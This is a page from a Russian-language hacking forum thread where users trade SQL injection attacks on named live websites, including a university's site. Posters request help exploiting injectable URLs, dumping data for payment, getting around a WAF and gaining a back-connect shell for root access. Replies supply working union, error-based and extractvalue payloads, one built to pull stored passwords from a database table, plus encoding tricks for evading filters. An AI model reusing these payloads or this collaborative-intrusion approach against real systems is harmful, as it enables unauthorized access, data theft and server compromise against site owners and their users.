Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Можно что нибудь сделать? :)
     
  2. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Code:
    http://le-studio.ch/photographers/index.php?aid=22'
    помогите раскрутить
     
  3. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Кто первым добивается вывода, получает '+'.
     
  4. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25

    http://clip2net.com/s/3ao8WVf
    http://clip2net.com/s/3ao93wA
     
    #23764 Br@!ns, 13 Jan 2015
    Last edited: 13 Jan 2015
    2 people like this.
  5. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    358
    Likes Received:
    313
    Reputations:
    163
    uname -a
    Code:
    Linux x.com 2.6.18-308.el5.028stab099.3 #1 SMP Wed Mar 7 15:56:00 MSK 2012 x86_64
    
    хочу порутать, но проблема в том, что не могу сделать бэк-коннект из-за отключенных системных функций
    Code:
     
    Disabled PHP Functions: dl , exec , passthru , pcntl_exec , pfsockopen , popen , posix_kill , posix_mkfifo , posix_setuid , proc_close , proc_open , proc_terminate , shell_exec , system , leak , posix_setpgid , posix_setsid , proc_get_status , proc_nice , show_source , escapeshellcmd
    
    php 5.3.3

    подскажите как можно это обойти и сделать бэк-коннект или хотя бы бинд порта.
     
  6. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Если апач+allowoverride включен, то можно попробовать ssi или cgi.
     
  7. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    Как обойти сей WAF?

    Code:
    http://ngmu.ru/common.php?page_services&section=-B'+union+select+1,2,3+--+
    True

    Code:
    http://ngmu.ru/common.php?page_services&section=-B'+union+select+1,2,user()+--+
    False
     
  8. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,419
    Likes Received:
    814
    Reputations:
    848
    WAF срабатывает на скобки:
    true
    false
    а вот собственно и таблички:
    и да, обрати внимание, что это "НОВОСИБИРСКИЙ ГОСУДАРСТВЕННЫЙ МЕДИЦИНСКИЙ УНИВЕРСИТЕТ"
     
    _________________________
    #23768 winstrool, 15 Jan 2015
    Last edited: 15 Jan 2015
    5 people like this.
  9. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    И забыл совсем про иные варианты команд. А как можно заменять скобки в таких конструкциях как concat? Char, base64?

    Хотя для char и base64 тоже нужны скобки.
     
    #23769 MaxFast, 15 Jan 2015
    Last edited: 15 Jan 2015
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    urlencode, double urlencode, utf encode
     
    _________________________
    1 person likes this.
  11. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Помогите со слепой скулей. скриптик написать или сдампить нужные данные.

    https://www.ckbproducts.com/ship_estimator.php?action=process

    POST

    сдампить нужно



    если нужно вознаграждение - в пм или жабу)
     
  12. nike001

    nike001 New Member

    Joined:
    19 Jan 2014
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    На сайте есть файл crossdomain.xml с таким содержимым:
    Code:
    <cross-domain-policy>
    <allow-access-from domain="*"/>
    </cross-domain-policy>
    Как это можно использовать?
     
  13. lion_art

    lion_art New Member

    Joined:
    20 Mar 2014
    Messages:
    6
    Likes Received:
    2
    Reputations:
    0
    Blind

    Не часто прошу о помощи, но в этот раз не могу понять как докрутить Blind http://occc.com.ua/dl/%22or(ExtractValue(1,concat%280x3a,%28select%28column_name%29from%28information_schema.columns%29where%60table_name%60=information_schema%20and%28ordinal_position=1%29%29%29%29%29=%27 Буду примного благодарен за помощь. :)
     
  14. reuvenmatbil

    reuvenmatbil New Member

    Joined:
    1 Sep 2012
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    http://www.urokrost.ru//forms/form_admin.php?ate=&klass=11&lessonform=1&mnu=4&region=2&sessionlogin=1%27

    помогите раскрутить
     
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    http://sethsec.blogspot.ru/2014/03/exploiting-misconfigured-crossdomainxml.html

    что именно не получается? составьте корректный запрос и все нормально

    Code:
    http://www.urokrost.ru//forms/form_admin.php?ate=&klass=11&lessonform=1&mnu=4&region=2&sessionlogin=1'|(extractvalue(1,repeat(version(),2)))='1
     
    _________________________
    #23775 yarbabin, 18 Jan 2015
    Last edited: 18 Jan 2015
    1 person likes this.
  16. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    128
    Likes Received:
    5
    Reputations:
    1

    вот пример как вот здесь,почему не выводится,таким запросом

    5*(SELECT 1 FROM information_schema.tables WHERE 1 group by concat((select (select (select concat(0x27,unhex(Hex(cast(netzwerk_schnittstelle.betreiber_id as char))),0x5e,unhex(Hex(cast(netzwerk_schnittstelle.betreiber_passwort as char))),0x5e,unhex(Hex(cast(netzwerk_schnittstelle.betreiber_kennung as char))),0x27) from `mlsvsf_db`.netzwerk_schnittstelle limit 1,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2)) having min(0))
     
  17. lion_art

    lion_art New Member

    Joined:
    20 Mar 2014
    Messages:
    6
    Likes Received:
    2
    Reputations:
    0
    В том то и дело, что не могу понять в чем ошибка моего запроса. 5я ветка... information_schema должна быть по определению...
    Unknown column 'information_schema' in 'where clause'
     
  18. KIR@PRO

    KIR@PRO Active Member

    Joined:
    26 Dec 2007
    Messages:
    823
    Likes Received:
    287
    Reputations:
    359
    information_schema - бд "по определению" а не колонка/таблица =)

    у тебя же
    а надо, если нужна именно information_schema (хотя непонятно зачем она тебе):
     
    _________________________
    #23778 KIR@PRO, 18 Jan 2015
    Last edited: 18 Jan 2015
    2 people like this.
  19. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.puntoverdefolletto.com/prodotto.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    в примере версия >5.1. у вас тоже? почему бы не использовать более короткий и понятный вектор?
    Code:
    http://www.paid2earn.de/img/media.php?art=1+|(extractvalue(1,concat(0x5c,version())))
     
    _________________________
Loading...
Thread Status:
Not open for further replies.